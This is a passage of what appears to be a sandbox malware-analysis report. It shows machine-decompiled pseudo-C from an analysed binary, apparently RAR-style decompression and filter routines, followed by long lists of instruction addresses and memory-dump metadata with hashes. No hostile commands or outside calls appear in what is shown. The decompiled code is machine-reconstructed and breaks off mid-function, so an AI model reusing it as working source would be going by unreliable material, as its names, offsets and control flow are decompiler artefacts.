									_t443 =  *((intOrPtr*)(_t455 + 0x1c));
									_t323 =  *((intOrPtr*)(_t440 + 0x74 + _t442 * 4)) + (_t416 -  *((intOrPtr*)(_t440 + 0x30 + _t442 * 4)) >> _t320 - _t442);
									__eflags = _t323 -  *((intOrPtr*)(_t440 + 0x30));
									asm("sbb eax, eax");
									_t210 = _t209 & _t323;
									__eflags = _t210;
									_t324 =  *(_t440 + 0xcb8 + _t210 * 2) & 0x0000ffff;
									goto L28;
								}
								_t404 = _t440 + 0x34 + _t207 * 4;
								while(1) {
									__eflags = _t416 -  *_t404;
									if(_t416 <  *_t404) {
										break;
									}
									_t207 = _t207 + 1;
									_t404 = _t404 + 4;
									__eflags = _t207 - 0xf;
									if(_t207 < 0xf) {
										continue;
									}
									goto L27;
								}
								_t442 = _t207;
								goto L27;
							} else {
								_t405 = 0x10;
								_t436 = _t416 >> _t405 - _t206;
								_t408 = ( *(_t436 + _t440 + 0xb8) & 0x000000ff) +  *(_t438 + 4);
								 *_t438 =  *_t438 + (_t408 >> 3);
								 *(_t438 + 4) = _t408 & 0x00000007;
								_t324 =  *(_t440 + 0x4b8 + _t436 * 2) & 0x0000ffff;
								L28:
								__eflags = _t324 - 0x100;
								if(_t324 >= 0x100) {
									__eflags = _t324 - 0x106;
									if(_t324 < 0x106) {
										__eflags = _t324 - 0x100;
										if(_t324 != 0x100) {
											__eflags = _t324 - 0x101;
											if(_t324 != 0x101) {
												_t212 = 3;
												 *_t295 = _t212;
												_t295[2] = _t324 - 0x102;
												_t214 = E00D7A4ED(_t438);
												_t215 =  *(_t440 + 0x2d78);
												_t420 = _t214 & 0x0000fffe;
												__eflags = _t420 -  *((intOrPtr*)(_t440 + 0x2cf8 + _t215 * 4));
												if(_t420 >=  *((intOrPtr*)(_t440 + 0x2cf8 + _t215 * 4))) {
													_t296 = 0xf;
													_t216 = _t215 + 1;
													__eflags = _t216 - _t296;
													if(_t216 >= _t296) {
														L85:
														_t327 =  *(_t438 + 4) + _t296;
														 *(_t438 + 4) = _t327 & 0x00000007;
														_t218 = _t327 >> 3;
														 *_t438 =  *_t438 + _t218;
														_t329 = 0x10;
														_t332 =  *((intOrPtr*)(_t440 + 0x2d38 + _t296 * 4)) + (_t420 -  *((intOrPtr*)(_t440 + 0x2cf4 + _t296 * 4)) >> _t329 - _t296);
														__eflags = _t332 -  *((intOrPtr*)(_t440 + 0x2cf4));
														asm("sbb eax, eax");
														_t219 = _t218 & _t332;
														__eflags = _t219;
														_t220 =  *(_t440 + 0x397c + _t219 * 2) & 0x0000ffff;
														L86:
														_t297 = _t220 & 0x0000ffff;
														__eflags = _t297 - 8;
														if(_t297 >= 8) {
															_t221 = 3;
															_t446 = (_t297 >> 2) - 1;
															_t301 = ((_t297 & _t221 | 0x00000004) << _t446) + 2;
															__eflags = _t446;
															if(_t446 != 0) {
																_t223 = E00D7A4ED(_t438);
																_t335 = 0x10;
																_t301 = _t301 + (_t223 >> _t335 - _t446);
																_t338 =  *(_t438 + 4) + _t446;
																 *_t438 =  *_t438 + (_t338 >> 3);
																_t339 = _t338 & 0x00000007;
																__eflags = _t339;
																 *(_t438 + 4) = _t339;
															}
														} else {
															_t301 = _t297 + 2;
														}
														( *(_t455 + 0x24))[1] = _t301;
														L91:
														_t414 =  *(_t455 + 0x14);
														_t201 =  *(_t455 + 0x18);
														_t293 =  *(_t455 + 0x3c);
														_t443 =  *((intOrPtr*)(_t455 + 0x1c));
														while(1) {
															_t314 =  *_t438;
															__eflags = _t314 - _t293;
															if(_t314 < _t293) {
																goto L15;
															}
															goto L9;
														}
													}
													_t341 = _t440 + 0x2cf8 + _t216 * 4;
													while(1) {
														__eflags = _t420 -  *_t341;
														if(_t420 <  *_t341) {
															break;
														}
														_t216 = _t216 + 1;
														_t341 = _t341 + 4;
														__eflags = _t216 - 0xf;
														if(_t216 < 0xf) {
															continue;
														}
														goto L85;
													}
													_t296 = _t216;
													goto L85;
												}
												_t342 = 0x10;
												_t423 = _t420 >> _t342 - _t215;
												_t345 = ( *(_t423 + _t440 + 0x2d7c) & 0x000000ff) +  *(_t438 + 4);
												 *_t438 =  *_t438 + (_t345 >> 3);
												 *(_t438 + 4) = _t345 & 0x00000007;
												_t220 =  *(_t440 + 0x317c + _t423 * 2) & 0x0000ffff;
												goto L86;
											}
											 *_t295 = 2;
											L33:
											_t414 =  *(_t455 + 0x14);
											_t201 =  *(_t455 + 0x18);
											_t293 =  *(_t455 + 0x3c);
											continue;
										}
										_push(_t455 + 0x28);
										E00D83564(_t443, _t438);
										_t295[1] =  *(_t455 + 0x28) & 0x000000ff;
										_t295[2] =  *(_t455 + 0x2c);
										_t424 = 4;
										 *_t295 = _t424;
										_t233 =  *(_t440 + 0x4ad8);
										_t349 = _t233 * 0xc +  *(_t440 + 0x4ad4);
										 *(_t440 + 0x4ad8) = _t233 + 1;
										_t349[1] =  *(_t455 + 0x34) & 0x000000ff;
										 *_t349 = _t424;
										_t349[2] =  *(_t455 + 0x30);
										goto L33;
									}
									_t237 = _t324 - 0x106;
									__eflags = _t237 - 8;
									if(_t237 >= 8) {
										_t350 = 3;
										_t304 = (_t237 >> 2) - 1;
										_t237 = (_t237 & _t350 | 0x00000004) << _t304;
										__eflags = _t237;
									} else {
										_t304 = 0;
									}
									_t447 = _t237 + 2;
									 *(_t455 + 0x10) = _t447;
									__eflags = _t304;
									if(_t304 != 0) {
										_t274 = E00D7A4ED(_t438);
										_t398 = 0x10;
										_t401 =  *(_t438 + 4) + _t304;
										 *(_t455 + 0x10) = _t447 + (_t274 >> _t398 - _t304);
										 *_t438 =  *_t438 + (_t401 >> 3);
										_t402 = _t401 & 0x00000007;
										__eflags = _t402;
										 *(_t438 + 4) = _t402;
									}
									_t240 = E00D7A4ED(_t438);
									_t241 =  *(_t440 + 0xfa0);
									_t426 = _t240 & 0x0000fffe;
									__eflags = _t426 -  *((intOrPtr*)(_t440 + 0xf20 + _t241 * 4));
									if(_t426 >=  *((intOrPtr*)(_t440 + 0xf20 + _t241 * 4))) {
										_t305 = 0xf;
										_t242 = _t241 + 1;
										__eflags = _t242 - _t305;
										if(_t242 >= _t305) {
											L49:
											_t354 =  *(_t438 + 4) + _t305;
											 *(_t438 + 4) = _t354 & 0x00000007;
											_t244 = _t354 >> 3;
											 *_t438 =  *_t438 + _t244;
											_t356 = 0x10;
											_t359 =  *((intOrPtr*)(_t440 + 0xf60 + _t305 * 4)) + (_t426 -  *((intOrPtr*)(_t440 + 0xf1c + _t305 * 4)) >> _t356 - _t305);
											__eflags = _t359 -  *((intOrPtr*)(_t440 + 0xf1c));
											asm("sbb eax, eax");
											_t245 = _t244 & _t359;
											__eflags = _t245;
											_t246 =  *(_t440 + 0x1ba4 + _t245 * 2) & 0x0000ffff;
											goto L50;
										}
										_t391 = _t440 + 0xf20 + _t242 * 4;
										while(1) {
											__eflags = _t426 -  *_t391;
											if(_t426 <  *_t391) {
												break;
											}
											_t242 = _t242 + 1;
											_t391 = _t391 + 4;
											__eflags = _t242 - 0xf;
											if(_t242 < 0xf) {
												continue;
											}
											goto L49;
										}
										_t305 = _t242;
										goto L49;
									} else {
										_t392 = 0x10;
										_t434 = _t426 >> _t392 - _t241;
										_t395 = ( *(_t434 + _t440 + 0xfa4) & 0x000000ff) +  *(_t438 + 4);
										 *_t438 =  *_t438 + (_t395 >> 3);
										 *(_t438 + 4) = _t395 & 0x00000007;
										_t246 =  *(_t440 + 0x13a4 + _t434 * 2) & 0x0000ffff;
										L50:
										_t247 = _t246 & 0x0000ffff;
										__eflags = _t247 - 4;
										if(_t247 >= 4) {
											_t308 = (_t247 >> 1) - 1;
											_t247 = (_t247 & 0x00000001 | 0x00000002) << _t308;
											__eflags = _t247;
										} else {
											_t308 = 0;
										}
										_t250 = _t247 + 1;
										 *(_t455 + 0x20) = _t250;
										_t448 = _t250;
										__eflags = _t308;
										if(_t308 == 0) {
											L68:
											__eflags = _t448 - 0x100;
											if(_t448 > 0x100) {
												_t253 =  *(_t455 + 0x10) + 1;
												 *(_t455 + 0x10) = _t253;
												__eflags = _t448 - 0x2000;
												if(_t448 > 0x2000) {
													_t254 = _t253 + 1;
													 *(_t455 + 0x10) = _t254;
													__eflags = _t448 - 0x40000;
													if(_t448 > 0x40000) {
														_t255 = _t254 + 1;
														__eflags = _t255;
														 *(_t455 + 0x10) = _t255;
													}
												}
											}
											_t251 =  *(_t455 + 0x24);
											 *_t251 = 1;
											_t251[1] =  *(_t455 + 0x10);
											_t251[2] = _t448;
											goto L91;
										} else {
											__eflags = _t308 - 4;
											if(__eflags < 0) {
												_t256 = E00D87D76(_t438);
												_t363 = 0x20;
												_t448 = (_t256 >> _t363 - _t308) +  *(_t455 + 0x20);
												_t366 =  *(_t438 + 4) + _t308;
												 *_t438 =  *_t438 + (_t366 >> 3);
												_t367 = _t366 & 0x00000007;
												__eflags = _t367;
												 *(_t438 + 4) = _t367;
												goto L68;
											}
											if(__eflags > 0) {
												_t269 = E00D87D76(_t438);
												_t384 = 0x24;
												_t448 = (_t269 >> _t384 - _t308 << 4) +  *(_t455 + 0x20);
												_t388 =  *(_t438 + 4) + 0xfffffffc + _t308;
												 *_t438 =  *_t438 + (_t388 >> 3);
												_t389 = _t388 & 0x00000007;
												__eflags = _t389;
												 *(_t438 + 4) = _t389;
											}
											_t259 = E00D7A4ED(_t438);
											_t260 =  *(_t440 + 0x1e8c);
											_t430 = _t259 & 0x0000fffe;
											__eflags = _t430 -  *((intOrPtr*)(_t440 + 0x1e0c + _t260 * 4));
											if(_t430 >=  *((intOrPtr*)(_t440 + 0x1e0c + _t260 * 4))) {
												_t309 = 0xf;
												_t261 = _t260 + 1;
												__eflags = _t261 - _t309;
												if(_t261 >= _t309) {
													L65:
													_t370 =  *(_t438 + 4) + _t309;
													 *(_t438 + 4) = _t370 & 0x00000007;
													_t263 = _t370 >> 3;
													 *_t438 =  *_t438 + _t263;
													_t372 = 0x10;
													_t375 =  *((intOrPtr*)(_t440 + 0x1e4c + _t309 * 4)) + (_t430 -  *((intOrPtr*)(_t440 + 0x1e08 + _t309 * 4)) >> _t372 - _t309);
													__eflags = _t375 -  *((intOrPtr*)(_t440 + 0x1e08));
													asm("sbb eax, eax");
													_t264 = _t263 & _t375;
													__eflags = _t264;
													_t265 =  *(_t440 + 0x2a90 + _t264 * 2) & 0x0000ffff;
													goto L66;
												}
												_t377 = _t440 + 0x1e0c + _t261 * 4;
												while(1) {
													__eflags = _t430 -  *_t377;
													if(_t430 <  *_t377) {
														break;
													}
													_t261 = _t261 + 1;
													_t377 = _t377 + 4;
													__eflags = _t261 - 0xf;
													if(_t261 < 0xf) {
														continue;
													}
													goto L65;
												}
												_t309 = _t261;
												goto L65;
											} else {
												_t378 = 0x10;
												_t433 = _t430 >> _t378 - _t260;
												_t381 = ( *(_t433 + _t440 + 0x1e90) & 0x000000ff) +  *(_t438 + 4);
												 *_t438 =  *_t438 + (_t381 >> 3);
												 *(_t438 + 4) = _t381 & 0x00000007;
												_t265 =  *(_t440 + 0x2290 + _t433 * 2) & 0x0000ffff;
												L66:
												_t448 = _t448 + (_t265 & 0x0000ffff);
												goto L68;
											}
										}
									}
								}
								__eflags =  *(_t440 + 0x4ad8) - 1;
								if( *(_t440 + 0x4ad8) <= 1) {
									L34:
									 *_t295 =  *_t295 & 0x00000000;
									_t295[2] = _t324;
									_t295[1] = 0;
									goto L33;
								}
								__eflags =  *(_t295 - 0xc);
								if( *(_t295 - 0xc) != 0) {
									goto L34;
								}
								_t279 =  *(_t295 - 8) & 0x0000ffff;
								_t435 = 3;
								__eflags = _t279 - _t435;
								if(_t279 >= _t435) {
									goto L34;
								}
								_t280 = _t279 + 1;
								 *(_t295 - 8) = _t280;
								 *((_t280 & 0x0000ffff) + _t295 - 4) = _t324;
								_t68 = _t440 + 0x4ad8;
								 *_t68 =  *(_t440 + 0x4ad8) - 1;
								__eflags =  *_t68;
								goto L33;
							}
						}
					}
					 *((char*)(_t440 + 0x4ad0)) = 1;
					goto L94;
				} else {
					 *((char*)(_t440 + 0x2c)) = 1;
					_push(_t440 + 0x30);
					_push(_t440 + 0x18);
					_push(_t440 + 4);
					_t291 = E00D8397F(__ecx);
					if(_t291 != 0) {
						goto L3;
					} else {
						 *((char*)(_t440 + 0x4ad0)) = 1;
						return _t291;
					}
				}
			}






















































































































              0x00d866a7
              0x00d866ad
              0x00d866b5
              0x00d866dc
              0x00d866df
              0x00d866e5
              0x00d866e8
              0x00d866ea
              0x00d86702
              0x00d86709
              0x00d8670b
              0x00d8670e
              0x00d86712
              0x00d86717
              0x00d86719
              0x00d8671b
              0x00d8671d
              0x00d8671d
              0x00d8671f
              0x00d86723
              0x00d86723
              0x00d86725
              0x00d86727
              0x00000000
              0x00000000
              0x00d86729
              0x00d86729
              0x00d8672b
              0x00d86ca2
              0x00d86ca3
              0x00000000
              0x00d86ca3
              0x00d86731
              0x00d8673f
              0x00d8673f
              0x00d86741
              0x00d86750
              0x00d86750
              0x00d86756
              0x00d86c9b
              0x00d86c9b
              0x00000000
              0x00d86c9b
              0x00000000
              0x00d86756
              0x00d86743
              0x00d8674a
              0x00000000
              0x00000000
              0x00000000
              0x00d8674a
              0x00d86733
              0x00d86736
              0x00d86739
              0x00000000
              0x00000000
              0x00000000
              0x00d8675c
              0x00d8675c
              0x00d86765
              0x00d8676b
              0x00d8676d
              0x00d86770
              0x00d86779
              0x00d8677a
              0x00d86785
              0x00d86789
              0x00d8678b
              0x00d86792
              0x00d86792
              0x00d86797
              0x00d86797
              0x00d8679d
              0x00d867a8
              0x00d867af
              0x00d867b3
              0x00d867b9
              0x00d867c0
              0x00d867c6
              0x00d867cc
              0x00d867d0
              0x00d867fd
              0x00d867fe
              0x00d867ff
              0x00d86801
              0x00d8681a
              0x00d8681d
              0x00d86824
              0x00d86827
              0x00d8682a
              0x00d86832
              0x00d8683b
              0x00d8683f
              0x00d86841
              0x00d86844
              0x00d86846
              0x00d86846
              0x00d86848
              0x00000000
              0x00d86848
              0x00d86806
              0x00d86809
              0x00d86809
              0x00d8680b
              0x00000000
              0x00000000
              0x00d8680d
              0x00d8680e
              0x00d86811
              0x00d86814
              0x00000000
              0x00000000
              0x00000000
              0x00d86816
              0x00d86818
              0x00000000
              0x00d867d2
              0x00d867d4
              0x00d867d7
              0x00d867e1
              0x00d867e9
              0x00d867ee
              0x00d867f1
              0x00d86850
              0x00d86855
              0x00d86857
              0x00d868a5
              0x00d868ab
              0x00d86b1e
              0x00d86b20
              0x00d86b71
              0x00d86b77
              0x00d86b86
              0x00d86b87
              0x00d86b91
              0x00d86b94
              0x00d86b9b
              0x00d86ba1
              0x00d86ba7
              0x00d86bae
              0x00d86bdb
              0x00d86bdc
              0x00d86bdd
              0x00d86bdf
              0x00d86bfb
              0x00d86bfe
              0x00d86c05
              0x00d86c08
              0x00d86c0b
              0x00d86c16
              0x00d86c22
              0x00d86c24
              0x00d86c2a
              0x00d86c2c
              0x00d86c2c
              0x00d86c2e
              0x00d86c36
              0x00d86c36
              0x00d86c39
              0x00d86c3c
              0x00d86c4a
              0x00d86c4d
              0x00d86c55
              0x00d86c58
              0x00d86c5a
              0x00d86c5e
              0x00d86c65
              0x00d86c6d
              0x00d86c6f
              0x00d86c76
              0x00d86c78
              0x00d86c78
              0x00d86c7b
              0x00d86c7b
              0x00d86c3e
              0x00d86c3e
              0x00d86c3e
              0x00d86c82
              0x00d86c86
              0x00d86c86
              0x00d86c8a
              0x00d86c8e
              0x00d86c92
              0x00d86723
              0x00d86723
              0x00d86725
              0x00d86727
              0x00000000
              0x00000000
              0x00000000
              0x00d86727
              0x00d86723
              0x00d86be7
              0x00d86bea
              0x00d86bea
              0x00d86bec
              0x00000000
              0x00000000
              0x00d86bee
              0x00d86bef
              0x00d86bf2
              0x00d86bf5
              0x00000000
              0x00000000
              0x00000000
              0x00d86bf7
              0x00d86bf9
              0x00000000
              0x00d86bf9
              0x00d86bb2
              0x00d86bb5
              0x00d86bbf
              0x00d86bc7
              0x00d86bcc
              0x00d86bcf
              0x00000000
              0x00d86bcf
              0x00d86b79
              0x00d86886
              0x00d86886
              0x00d8688a
              0x00d8688e
              0x00000000
              0x00d8688e
              0x00d86b28
              0x00d86b2a
              0x00d86b34
              0x00d86b3c
              0x00d86b41
              0x00d86b42
              0x00d86b44
              0x00d86b4d
              0x00d86b54
              0x00d86b5f
              0x00d86b67
              0x00d86b69
              0x00000000
              0x00d86b69
              0x00d868b1
              0x00d868b7
              0x00d868ba
              0x00d868c7
              0x00d868ca
              0x00d868d0
              0x00d868d0
              0x00d868bc
              0x00d868bc
              0x00d868bc
              0x00d868d2
              0x00d868d5
              0x00d868d9
              0x00d868db
              0x00d868df
              0x00d868e6
              0x00d868f0
              0x00d868f2
              0x00d868fb
              0x00d868fd
              0x00d868fd
              0x00d86900
              0x00d86900
              0x00d86905
              0x00d8690c
              0x00d86912
              0x00d86918
              0x00d8691f
              0x00d8694c
              0x00d8694d
              0x00d8694e
              0x00d86950
              0x00d8696c
              0x00d8696f
              0x00d86976
              0x00d86979
              0x00d8697c
              0x00d86987
              0x00d86993
              0x00d86995
              0x00d8699b
              0x00d8699d
              0x00d8699d
              0x00d8699f
              0x00000000
              0x00d8699f
              0x00d86958
              0x00d8695b
              0x00d8695b
              0x00d8695d
              0x00000000
              0x00000000
              0x00d8695f
              0x00d86960
              0x00d86963
              0x00d86966
              0x00000000
              0x00000000
              0x00000000
              0x00d86968
              0x00d8696a
              0x00000000
              0x00d86921
              0x00d86923
              0x00d86926
              0x00d86930
              0x00d86938
              0x00d8693d
              0x00d86940
              0x00d869a7
              0x00d869a7
              0x00d869aa
              0x00d869ad
              0x00d869bd
              0x00d869c0
              0x00d869c0
              0x00d869af
              0x00d869af
              0x00d869af
              0x00d869c2
              0x00d869c3
              0x00d869c7
              0x00d869c9
              0x00d869cb
              0x00d86ad9
              0x00d86ad9
              0x00d86adf
              0x00d86ae5
              0x00d86ae6
              0x00d86aea
              0x00d86af0
              0x00d86af2
              0x00d86af3
              0x00d86af7
              0x00d86afd
              0x00d86aff
              0x00d86aff
              0x00d86b00
              0x00d86b00
              0x00d86afd
              0x00d86af0
              0x00d86b04
              0x00d86b0c
              0x00d86b12
              0x00d86b16
              0x00000000
              0x00d869d1
              0x00d869d1
              0x00d869d4
              0x00d86ab5
              0x00d86abe
              0x00d86ac6
              0x00d86aca
              0x00d86ad1
              0x00d86ad3
              0x00d86ad3
              0x00d86ad6
              0x00000000
              0x00d86ad6
              0x00d869da
              0x00d869de
              0x00d869e7
              0x00d869f5
              0x00d869f9
              0x00d86a00
              0x00d86a02
              0x00d86a02
              0x00d86a05
              0x00d86a05
              0x00d86a0a
              0x00d86a11
              0x00d86a17
              0x00d86a1d
              0x00d86a24
              0x00d86a51
              0x00d86a52
              0x00d86a53
              0x00d86a55
              0x00d86a71
              0x00d86a74
              0x00d86a7b
              0x00d86a7e
              0x00d86a81
              0x00d86a8c
              0x00d86a98
              0x00d86a9a
              0x00d86aa0
              0x00d86aa2
              0x00d86aa2
              0x00d86aa4
              0x00000000
              0x00d86aa4
              0x00d86a5d
              0x00d86a60
              0x00d86a60
              0x00d86a62
              0x00000000
              0x00000000
              0x00d86a64
              0x00d86a65
              0x00d86a68
              0x00d86a6b
              0x00000000
              0x00000000
              0x00000000
              0x00d86a6d
              0x00d86a6f
              0x00000000
              0x00d86a26
              0x00d86a28
              0x00d86a2b
              0x00d86a35
              0x00d86a3d
              0x00d86a42
              0x00d86a45
              0x00d86aac
              0x00d86aaf
              0x00000000
              0x00d86aaf
              0x00d86a24
              0x00d869cb
              0x00d8691f
              0x00d86859
              0x00d86860
              0x00d86897
              0x00d86897
              0x00d8689c
              0x00d8689f
              0x00000000
              0x00d8689f
              0x00d86862
              0x00d86866
              0x00000000
              0x00000000
              0x00d86868
              0x00d8686e
              0x00d8686f
              0x00d86872
              0x00000000
              0x00000000
              0x00d86874
              0x00d86875
              0x00d8687c
              0x00d86880
              0x00d86880
              0x00d86880
              0x00000000
              0x00d86880
              0x00d867d0
              0x00d86723
              0x00d866ec
              0x00000000
              0x00d866b7
              0x00d866ba
              0x00d866be
              0x00d866c2
              0x00d866c6
              0x00d866c7
              0x00d866ce
              0x00000000
              0x00d866d0
              0x00d866d0
              0x00000000
              0x00d866d0
              0x00d866ce

              Memory Dump Source
              • Source File: 00000001.00000002.373443705.0000000000D71000.00000020.00020000.sdmp, Offset: 00D70000, based on PE: true
              • Associated: 00000001.00000002.373439445.0000000000D70000.00000002.00020000.sdmp Download File
              • Associated: 00000001.00000002.373464434.0000000000DA2000.00000002.00020000.sdmp Download File
              • Associated: 00000001.00000002.373473177.0000000000DAD000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.373481851.0000000000DB4000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.373490541.0000000000DD0000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.373494152.0000000000DD1000.00000002.00020000.sdmp Download File
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 457ba4f20ca8dd351402367767b1fb7d3fbb5e59b4870bc4c911d2c44d65edbc
              • Instruction ID: ad941bdd90ea0e09cc36726fba513cfcd5a5d0504784d9fb1da7afe4b567c790
              • Opcode Fuzzy Hash: 457ba4f20ca8dd351402367767b1fb7d3fbb5e59b4870bc4c911d2c44d65edbc
              • Instruction Fuzzy Hash: E612D4B16047068BC728EF28C9D0A79B7E1FF54318F14892EE59BC7A80E374E895CB55
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00D7BAD1, Relevance: .4, Instructions: 449COMMONCrypto
              Download Yara Rule
              C-Code - Quality: 100%
              			E00D7BAD1(signed int* __ecx) {
				void* __edi;
				signed int _t194;
				signed int _t197;
				void* _t204;
				signed char _t205;
				signed int _t215;
				signed int _t217;
				signed int _t218;
				intOrPtr _t219;
				signed int _t221;
				signed int _t223;
				void* _t234;
				signed int _t235;
				signed int _t238;
				signed int _t266;
				void* _t267;
				void* _t268;
				void* _t269;
				void* _t270;
				void* _t271;
				signed int _t274;
				intOrPtr _t275;
				void* _t276;
				signed char* _t277;
				signed int _t278;
				signed int _t279;
				signed int _t281;
				char _t282;
				signed int _t284;
				signed int _t285;
				signed char _t289;
				void* _t290;
				intOrPtr _t292;
				signed int _t293;
				signed char* _t297;
				signed int _t304;
				signed int _t306;
				signed int _t308;
				signed char _t309;
				signed int _t310;
				intOrPtr _t311;
				void* _t312;
				void* _t313;
				unsigned int _t316;
				signed int _t317;
				signed int _t319;
				signed int _t320;
				signed int _t321;
				signed int _t322;
				signed char _t323;
				signed int _t324;
				signed int _t325;
				void* _t326;
				void* _t327;
				void* _t328;
				signed int _t331;
				signed char _t332;
				signed int _t333;
				signed char* _t334;
				signed int _t335;
				signed int _t336;
				signed char _t338;
				unsigned int _t340;
				signed int _t345;
				void* _t350;
				signed int _t351;
				signed int _t352;
				signed int _t353;
				void* _t354;
				void* _t355;

				_t311 =  *((intOrPtr*)(_t355 + 4));
				_t339 = __ecx;
				if(_t311 <= 0) {
					L15:
					return 1;
				}
				if(_t311 <= 2) {
					_t194 = __ecx[5];
					_t284 =  *__ecx;
					_t340 = __ecx[7];
					_t276 = _t194 - 4;
					if(_t276 > 0x3fffc) {
						L98:
						return 0;
					}
					_t326 = 0;
					_t197 = (_t194 & 0xffffff00 | _t311 == 0x00000002) + 0xe8;
					 *(_t355 + 0x60) = _t197;
					if(_t276 == 0) {
						goto L15;
					} else {
						goto L88;
					}
					do {
						L88:
						_t312 =  *_t284;
						_t284 = _t284 + 1;
						_t327 = _t326 + 1;
						_t340 = _t340 + 1;
						if(_t312 == 0xe8 || _t312 == _t197) {
							_t313 =  *_t284;
							if(_t313 >= 0) {
								_t191 = _t313 - 0x1000000; // -16777215
								if(_t191 < 0) {
									 *_t284 = _t313 - _t340;
								}
							} else {
								if(_t340 + _t313 >= 0) {
									_t190 = _t313 + 0x1000000; // 0x1000001
									 *_t284 = _t190;
								}
							}
							_t197 =  *(_t355 + 0x60);
							_t284 = _t284 + 4;
							_t326 = _t327 + 4;
							_t340 = _t340 + 4;
						}
					} while (_t326 < _t276);
					goto L15;
				}
				if(_t311 == 3) {
					_t277 =  *__ecx;
					_t328 = __ecx[5] - 0x15;
					if(_t328 > 0x3ffeb) {
						goto L98;
					}
					_t316 = __ecx[7] >> 4;
					 *(_t355 + 0x28) = _t316;
					if(_t328 == 0) {
						goto L15;
					}
					_t331 = (_t328 - 1 >> 4) + 1;
					 *(_t355 + 0x30) = _t331;
					do {
						_t204 = ( *_t277 & 0x1f) - 0x10;
						if(_t204 < 0) {
							goto L84;
						}
						_t205 =  *((intOrPtr*)(_t204 + 0xdad070));
						if(_t205 == 0) {
							goto L84;
						}
						_t332 =  *(_t355 + 0x28);
						_t285 = 0;
						_t317 = _t205 & 0x000000ff;
						 *((intOrPtr*)(_t355 + 0x64)) = 0;
						 *(_t355 + 0x38) = _t317;
						_t350 = 0x12;
						do {
							if((_t317 & 1) != 0) {
								_t175 = _t350 + 0x18; // 0x2a
								if(E00D7C03A(_t277, _t175, 4) == 5) {
									E00D7C085(_t277, E00D7C03A(_t277, _t350, 0x14) - _t332 & 0x000fffff, _t350, 0x14);
								}
								_t317 =  *(_t355 + 0x34);
								_t285 =  *(_t355 + 0x60);
							}
							_t285 = _t285 + 1;
							_t350 = _t350 + 0x29;
							 *(_t355 + 0x60) = _t285;
						} while (_t350 <= 0x64);
						_t331 =  *(_t355 + 0x30);
						_t316 =  *(_t355 + 0x28);
						L84:
						_t277 =  &(_t277[0x10]);
						_t316 = _t316 + 1;
						_t331 = _t331 - 1;
						 *(_t355 + 0x28) = _t316;
						 *(_t355 + 0x30) = _t331;
					} while (_t331 != 0);
					goto L15;
				}
				if(_t311 == 4) {
					_t215 = __ecx[1];
					_t289 = __ecx[5];
					_t333 = __ecx[2];
					 *(_t355 + 0x60) = _t215;
					_t278 = _t215 - 3;
					 *(_t355 + 0x28) = _t289;
					 *(_t355 + 0x34) = _t278;
					 *(_t355 + 0x3c) = _t333;
					if(_t289 - 3 > 0x1fffd || _t278 > _t289 || _t333 > 2) {
						goto L98;
					} else {
						_t217 =  *__ecx;
						 *(_t355 + 0x24) = _t217;
						_t351 = _t217 + _t289;
						_t218 = 0;
						 *(_t355 + 0x14) = _t351;
						_t319 = _t351 - _t278;
						 *(_t355 + 0x1c) = 0;
						 *(_t355 + 0x10) = _t319;
						do {
							_t279 = 0;
							if(_t218 >= _t289) {
								goto L67;
							}
							_t334 = _t319 + _t218;
							_t320 =  *(_t355 + 0x60);
							_t221 =  *(_t355 + 0x34) - _t351;
							_t352 =  *(_t355 + 0x34);
							 *(_t355 + 0x20) = _t221;
							do {
								if( &(_t334[_t221]) >= _t320) {
									_t227 =  *_t334 & 0x000000ff;
									_t291 =  *(_t334 - 3) & 0x000000ff;
									 *(_t355 + 0x30) =  *_t334 & 0x000000ff;
									 *(_t355 + 0x2c) =  *(_t334 - 3) & 0x000000ff;
									 *(_t355 + 0x3c) = E00D94E62(_t320, _t227 - _t291 + _t279 - _t279);
									 *(_t355 + 0x24) = E00D94E62(_t320, _t227 - _t291 + _t279 -  *(_t355 + 0x34));
									_t234 = E00D94E62(_t320, _t227 - _t291 + _t279 -  *(_t355 + 0x34));
									_t292 =  *((intOrPtr*)(_t355 + 0x44));
									_t355 = _t355 + 0xc;
									_t321 =  *(_t355 + 0x18);
									if(_t292 > _t321 || _t292 > _t234) {
										_t289 =  *(_t355 + 0x28);
										_t320 =  *(_t355 + 0x60);
										_t279 =  *(_t355 + 0x30);
										if(_t321 > _t234) {
											_t279 =  *(_t355 + 0x2c);
										}
									} else {
										_t289 =  *(_t355 + 0x28);
										_t320 =  *(_t355 + 0x60);
									}
								}
								_t223 =  *(_t355 + 0x24);
								_t279 = _t279 -  *_t223 & 0x000000ff;
								 *(_t355 + 0x24) = _t223 + 1;
								_t334[_t352] = _t279;
								_t334 =  &(_t334[3]);
								_t221 =  *(_t355 + 0x20);
							} while ( &(_t334[ *(_t355 + 0x20)]) < _t289);
							_t351 =  *(_t355 + 0x14);
							_t218 =  *(_t355 + 0x1c);
							_t319 =  *(_t355 + 0x10);
							L67:
							_t218 = _t218 + 1;
							 *(_t355 + 0x1c) = _t218;
						} while (_t218 < 3);
						_t335 =  *(_t355 + 0x3c);
						_t290 = _t289 + 0xfffffffe;
						while(_t335 < _t290) {
							_t219 =  *((intOrPtr*)(_t335 + _t351 + 1));
							 *((intOrPtr*)(_t335 + _t351)) =  *((intOrPtr*)(_t335 + _t351)) + _t219;
							 *((intOrPtr*)(_t335 + _t351 + 2)) =  *((intOrPtr*)(_t335 + _t351 + 2)) + _t219;
							_t335 = _t335 + 3;
						}
						goto L15;
					}
				}
				if(_t311 == 5) {
					_t235 = __ecx[5];
					_t293 =  *__ecx;
					_t281 = __ecx[1];
					 *(_t355 + 0x2c) = _t293;
					 *(_t355 + 0x30) = _t235;
					 *(_t355 + 0x38) = _t293 + _t235;
					if(_t235 > 0x20000 || _t281 > 0x80 || _t281 == 0) {
						goto L98;
					} else {
						_t336 = 0;
						 *(_t355 + 0x34) = 0;
						if(_t281 == 0) {
							goto L15;
						} else {
							goto L21;
						}
						do {
							L21:
							 *(_t355 + 0x20) =  *(_t355 + 0x20) & 0x00000000;
							 *(_t355 + 0x1c) =  *(_t355 + 0x1c) & 0x00000000;
							_t345 = 0;
							 *(_t355 + 0x18) =  *(_t355 + 0x18) & 0x00000000;
							_t353 = 0;
							 *(_t355 + 0x14) =  *(_t355 + 0x14) & 0x00000000;
							 *(_t355 + 0x60) =  *(_t355 + 0x60) & 0;
							 *(_t355 + 0x1c) = 0;
